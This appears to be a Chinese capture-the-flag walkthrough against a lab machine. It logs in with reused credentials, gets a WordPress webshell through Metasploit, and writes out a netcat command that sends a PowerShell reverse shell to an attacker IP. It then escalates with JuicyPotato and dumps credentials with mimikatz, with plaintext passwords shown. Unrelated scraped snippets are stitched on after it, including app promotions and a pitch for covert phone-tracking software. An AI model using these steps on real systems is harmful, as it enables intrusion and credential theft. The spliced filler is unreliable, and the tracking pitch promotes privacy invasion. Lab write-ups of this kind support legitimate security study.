目标网站ip:10.10.10.29最终目的:拿到flag,提升到管理员权限。
发现开放了80和3306俩个端口
发现有个登录页面,根据提示是上个靶场的账号和密码,登录进去
账号:admin
密码:P@s5w0rd!
msfconsole //进入kali的metasploit攻击框架
search wp_admin? //查找wordpress获取webshell的利用模块
use 0? //使用编号为0的模块
show options //显示设置需要配置的参数
设置参数
成功获得权限,但回连之后特别容易断
查看系统信息
Kaili端就会返回一个cmd命令行
用刚才获取到的nc shell在目标机器上生成一个批处理文件,目的是让netcat将靶机的powershell发送至kali的1111端口
echo START C:\inetpub\wwwroot\wordpress\wp-content?ds c64.exe -e powershell.exe 10.10.14.6 1111 > shell.bat
使用多汁的土豆这个工具去执行生成shell.bat,并设置监听端口1111
JP.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content?ds ihao.bat -l 1337
但奇怪的是,1111端口一直没有返回监听,可能设置出来问题我就改了端口,改为了4567就返回了shell,提权成功,是管理员权限
上传mimikatz到靶机上去
执行mimikatz命令获取域内账户和密码
获得了一个账号名:sandra 密码:Password1234!
2020年5月15日支付宝蚂蚁庄园庄园小课堂答案是什么?5月15日的问题是家里饲养的大鹅,它们的祖先是?给出的选项是天鹅、野雁,大家知道应该选择哪个答案吗?下面小编为大家带来了2020年5月15日庄园...
本文目录一览: 1、黑客帝国机器大帝和建筑师是一个人吗 2、黑客帝国的机器人是谁造的 3、黑客帝国3中那个白头发老头(建筑师)和机器城是什么关系 4、黑客帝国里面的建筑师的真实身份到底是什...
您好,预付费是需要先交费才能使用的,欠费就不能使用,后付费可以先消费后交费,您只需在次月出账单后交费即可。 北京联通ADSL后付费客户可登录首页点击宽带自服务>ADSL上网产品>后付费A...
财商挑战是微信里的一个小程序,新用户注册免费领取0.5米,天天猜涨跌可免费获得现金红包,一次0.3米以上,首次累计满1米即可提现微信零钱,亲测秒到账! 财商挑战小程序码: 1.微信扫码进入,授...
不用另一方点开立即定位,键入另一方手机号码立即定位如 果你要定位或查看一 个手机上现阶段所属的部位是 十分艰难的,在技术上而言還是 能完成的,它是归属于私人信息,此外有一个方式便是安裝定位手机软件在自...
小孩子吵着要当黑客,怎么办?(是当好黑客,四年级。 他的父母也知道了要及时的纠正孩子的思想,毕竟他还小,不知道那些事情不可以做,如果不提前纠正,以后很可能走上犯罪的道路。学习如何编程。这当然是最基本的...